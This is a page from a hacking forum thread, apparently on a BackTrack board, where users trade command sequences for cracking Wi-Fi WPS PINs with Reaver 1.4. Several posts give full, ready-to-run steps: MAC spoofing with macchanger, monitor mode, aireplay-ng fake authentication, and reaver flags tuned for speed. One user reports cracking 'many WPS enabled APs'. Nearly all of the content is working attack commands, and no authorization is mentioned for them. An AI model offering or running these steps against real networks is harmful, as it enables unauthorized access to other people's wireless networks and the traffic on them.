Page 2 of 3 FirstFirst 123 LastLast
Results 11 to 20 of 21

Thread: Reaver 1.4 WPS Bruteforce Tool Install/Scan/Bruteforce Tutorial

  1. #11
    Good friend of the forums Eatme's Avatar
    Join Date
    Aug 2009
    Location
    Socks5
    Posts
    308

    Default Re: Reaver 1.4 WPS Bruteforce Tool Install/Scan/Bruteforce Tutorial

    *This worked for me

    :~# airmon-ng stop wlan0/mon0
    ifconfig wlan0 down
    macchanger -a wlan0 > copy mac
    airmon-ng start wlan0 11 < AP channel
    ifconfig mon0 down
    macchanger -m "paste same mac" mon0
    ifconfig wlan0 up
    ifconfig mon0 up

    open new > TAB/Window/Terminal
    aireplay-ng mon0 -1 120 -a BSSID -e ESSID > let it run

    :~# reaver -i mon0 -A -b BSSID -v -d 1 -x 30 -l 600

    -d 1 can be -d 0 (0 might be too fast, in case it is add -l 60 or 120)
    -play around with -x 30 as well, i manage to get 5-20+ keys /seconds without any errors

    *This worked for me

    Last edited by Eatme; 05-23-2012 at 07:26 AM.
    Wiffy-Auto-Cracker - was the best thing that ever happen to me. :) Wo0oT :)
    AWUSO36H_500mW_5dBi Antenna

  2. #12
    Just burned his ISO dombera's Avatar
    Join Date
    Dec 2010
    Location
    London
    Posts
    9

    Default Re: Reaver 1.4 WPS Bruteforce Tool Install/Scan/Bruteforce Tutorial

    Hi Eatme! Thans for the info!
    I was wondering if you could post your conkyrc file as I like your config a lot?

  3. #13
    Good friend of the forums Eatme's Avatar
    Join Date
    Aug 2009
    Location
    Socks5
    Posts
    308

    Default Re: Reaver 1.4 WPS Bruteforce Tool Install/Scan/Bruteforce Tutorial

    Quote Originally Posted by dombera View Post
    Hi Eatme! Thans for the info!
    I was wondering if you could post your conkyrc file as I like your config a lot?
    hey, np!

    and thanks , but I can't seem to find my conkyrc file... I'm guessing I don't have it installed.
    Wiffy-Auto-Cracker - was the best thing that ever happen to me. :) Wo0oT :)
    AWUSO36H_500mW_5dBi Antenna

  4. #14
    Good friend of the forums Eatme's Avatar
    Join Date
    Aug 2009
    Location
    Socks5
    Posts
    308

    Default Re: Reaver 1.4 WPS Bruteforce Tool Install/Scan/Bruteforce Tutorial

    im guessing the lower the (xx seconds/pin) are the faster its cracking or is it the higher they are..

    I'm trying to test out some diff commands to make it crack the fastest without errors.. or trying the same pin

    The highest I have it at is (10-20 seconds/pin)
    Wiffy-Auto-Cracker - was the best thing that ever happen to me. :) Wo0oT :)
    AWUSO36H_500mW_5dBi Antenna

  5. #15
    Member longjidin's Avatar
    Join Date
    Feb 2010
    Location
    Kg Lengkong to Bukit Lada
    Posts
    93

    Default Re: Reaver 1.4 WPS Bruteforce Tool Install/Scan/Bruteforce Tutorial

    i am using this method its take time between 2 or 10 hour depend on the PIN correct me if i am wrong....
    Last edited by longjidin; 05-30-2012 at 12:27 AM. Reason: change icon

  6. #16
    Just burned his ISO
    Join Date
    Jun 2012
    Posts
    2

    Default Re: Reaver 1.4 WPS Bruteforce Tool Install/Scan/Bruteforce Tutorial

    Quote Originally Posted by Eatme View Post
    *This worked for me

    :~# airmon-ng stop wlan0/mon0
    ifconfig wlan0 down
    macchanger -a wlan0 > copy mac
    airmon-ng start wlan0 11 < AP channel
    ifconfig mon0 down
    macchanger -m "paste same mac" mon0
    ifconfig wlan0 up
    ifconfig mon0 up

    open new > TAB/Window/Terminal
    aireplay-ng mon0 -1 120 -a BSSID -e ESSID > let it run

    :~# reaver -i mon0 -A -b BSSID -v -d 1 -x 30 -l 600

    -d 1 can be -d 0 (0 might be too fast, in case it is add -l 60 or 120)
    -play around with -x 30 as well, i manage to get 5-20+ keys /seconds without any errors

    *This worked for me

    What is meant by copy mac, mac wireless card or mac AP

  7. #17
    Just burned his ISO
    Join Date
    Jun 2012
    Posts
    2

    Default Re: Reaver 1.4 WPS Bruteforce Tool Install/Scan/Bruteforce Tutorial

    macchanger -a wlan0 > copy mac

    what is meant by copy mac, is it mac wireless card or mac app

  8. #18
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Default Re: Reaver 1.4 WPS Bruteforce Tool Install/Scan/Bruteforce Tutorial

    Quote Originally Posted by TAPE View Post
    I was having good results with v1.3, however was having difficulty with v1.4;
    it was not associating with my test router whereas v1.3 was associating fine.

    My work around was associating with aireplay-ng and running reaver with the -A switch ;

    So in 1 terminal window ;
    Code:
    aireplay-ng mon0 -1 120 -b 00:11:22:33:55 -e ESSID
    In another terminal window ;
    Code:
    reaver -i mon0 -A -c XX -b 00:11:22:33:44:55 -v
    Am still running through it, however sofar so good.

    Apologies for quoting this old comment.
    What is the reason for running

    Code:
    aireplay-ng mon0 -1 120 -b 00:11:22:33:55 -e ESSID
    simultaneously with reaver in another terminal please.

    I have been able to crack many WPS enabled APs just with this command:

    Code:
    reaver -i mon0 -b BSSID -c 7 -x 60 -a -f -vv
    Question1: What is the need to for the aireplay-ng command in another terminal?
    Question2: Can you run reaver 1.4 and reaver 1.3 in the same BT installation please?

    Kind regards always

  9. #19
    Very good friend of the forum TAPE's Avatar
    Join Date
    Jan 2010
    Location
    Europe
    Posts
    599

    Default Re: Reaver 1.4 WPS Bruteforce Tool Install/Scan/Bruteforce Tutorial

    1) The reason for me running the aireplay command was due to reaver not functioning as it should
    on the installation I had at that time. Not sure what the error was that necessitated that, but it
    was a work around that worked at the time.
    With a later install on the later released BT5R2 it was no longer required for me.
    It was a fix that was required only when reaver was not correctly associating on my setup, if it works
    'out of the box' for you then no need to even consider it.

    2) Actually, I dont think you can with the normal install procedures as one will overwrite the other..

  10. #20
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Default Re: Reaver 1.4 WPS Bruteforce Tool Install/Scan/Bruteforce Tutorial

    Quote Originally Posted by TAPE View Post
    2) Actually, I dont think you can with the normal install procedures as one will overwrite the other..
    Got that.. I am having a lot of issues lately with reaver 1.4..

    In your opinion do you think reaver 1.3 is better, plz

Page 2 of 3 FirstFirst 123 LastLast

Similar Threads

  1. Looking for a special kind of Bruteforce tool.
    By crankenstein in forum Experts Forum
    Replies: 1
    Last Post: 03-08-2011, 11:16 PM
  2. bruteforce router
    By mark_01 in forum Angolo Wireless
    Replies: 9
    Last Post: 08-27-2009, 08:19 AM
  3. Bruteforce htaccess
    By whitehat42 in forum OLD Newbie Area
    Replies: 2
    Last Post: 06-24-2009, 07:41 PM
  4. [help]brutus bruteforce
    By maddog_rsf in forum OLD Newbie Area
    Replies: 0
    Last Post: 03-30-2008, 02:01 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •